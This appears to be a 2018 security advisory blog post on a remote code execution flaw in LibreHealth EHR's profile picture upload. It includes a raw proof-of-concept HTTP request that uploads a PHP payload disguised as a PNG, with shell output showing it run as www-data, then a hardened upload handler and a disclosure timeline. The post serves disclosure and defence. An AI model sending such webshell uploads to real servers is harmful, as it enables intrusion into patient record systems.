0dd - The Zero (0) Day Division

The Zero (0) Day Division is a group of security professionals working towards a common goal: securing open-source projects.

LH-EHR RCE Via Picture Upload

The Issue

An arbitrary file upload vulnerability lets any user who can set a profile picture execute code on the hosting system. In lh-ehr the attacker must be authenticated and must have sufficient privileges to upload a profile picture, either for a user or for a patient. Any valid user appears to have that privilege, so in practice every account can perform this attack.

Issue location

The vulnerable upload handling is at https://github.com/LibreHealthIO/lh-ehr/blob/5b5f427c4742f901e426f17325fb0aaf8209e0bb/interface/patient_file/summary/demographics.php#L1735


Proof of concept: upload a PHP file as a patient profile picture. The filename and the declared Content-Type are both attacker-controlled; here the part claims to be image/png but carries a .php name and PHP source.

POST /lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------216243089528218
Content-Length: 252
Cookie: LibreHealthEHR=e2hroqj4n8d8odrds55bes4ui2
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------216243089528218
Content-Disposition: form-data; name="profile_picture"; filename="T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php"
Content-Type: image/png

<?php echo `id`; ?>
-----------------------------216243089528218--

The file is written under the web root in the profile_pictures directory with its original name, so requesting it from the server executes it as the web server user:

ubuntu@ubuntu:/var/www/html/lh-ehr/profile_pictures$ curl
uid=33(www-data) gid=33(www-data) groups=33(www-data)
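The pattern behind the issue is an upload handler that keeps the client-supplied filename and writes it under the web root. The sketch below, added here as an illustration, is not lh-ehr's code and does not reproduce demographics.php: it shows that unsafe pattern next to a hardened handler that sniffs the real content type, chooses the extension and filename server-side, and stores the file outside the document root. The function names, the $webroot and $storeDir parameters and the 2 MiB size limit are assumptions.

```php
<?php
// Added example, not lh-ehr's code. Sketch of the unsafe pattern versus a
// hardened profile picture handler. $webroot/$storeDir are assumed paths.
declare(strict_types=1);

// Unsafe: trusts $upload['name'] (and, if it checks anything at all, the
// client's declared Content-Type). A "shell.php" upload lands as an
// executable script under the web root, which is exactly the PoC above.
function saveProfilePictureUnsafe(array $upload, string $webroot): string
{
    $dest = $webroot . '/profile_pictures/' . $upload['name'];
    move_uploaded_file($upload['tmp_name'], $dest);
    return $dest;
}

// Hardened: verify the bytes really are an image, ignore the client's name
// and declared type, derive the extension from the detected type, and keep
// the file outside the document root under a random server-chosen name.
function saveProfilePictureSafe(array $upload, string $storeDir): string
{
    if (!isset($upload['error']) || $upload['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Guards against a handler being pointed at an arbitrary local path.
    if (!is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($upload['size'] > 2 * 1024 * 1024) {           // assumed limit
        throw new RuntimeException('file too large');
    }

    // Sniff the real content; $upload['type'] comes from the client.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($upload['tmp_name']);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('unsupported image type: ' . $mime);
    }
    // Must also parse as an image, not just carry a matching magic number.
    if (getimagesize($upload['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Server-chosen name: no client input, no path separators, fixed extension.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($storeDir, '/') . '/' . $name;
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);                                 // never executable
    return $dest;
}
```

Called from the form handler as `saveProfilePictureSafe($_FILES['profile_picture'], '/var/lib/lh-ehr/profile_pictures')` (assumed path), the PoC request is rejected at the finfo check because its body is PHP source, not a PNG. Because the store directory is outside the web root, images have to be served back through a script that reads the file and sets Content-Type from the recorded extension; even then the random name and server-forced extension mean nothing the client sent decides how the server interprets the file. The `finfo` class needs PHP's fileinfo extension.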

Disclosure Timeline

  • Issue Reported: 11th August 2018
  • Issue Resolved: <TBD>
  • Blog Post Published: 3rd September 2018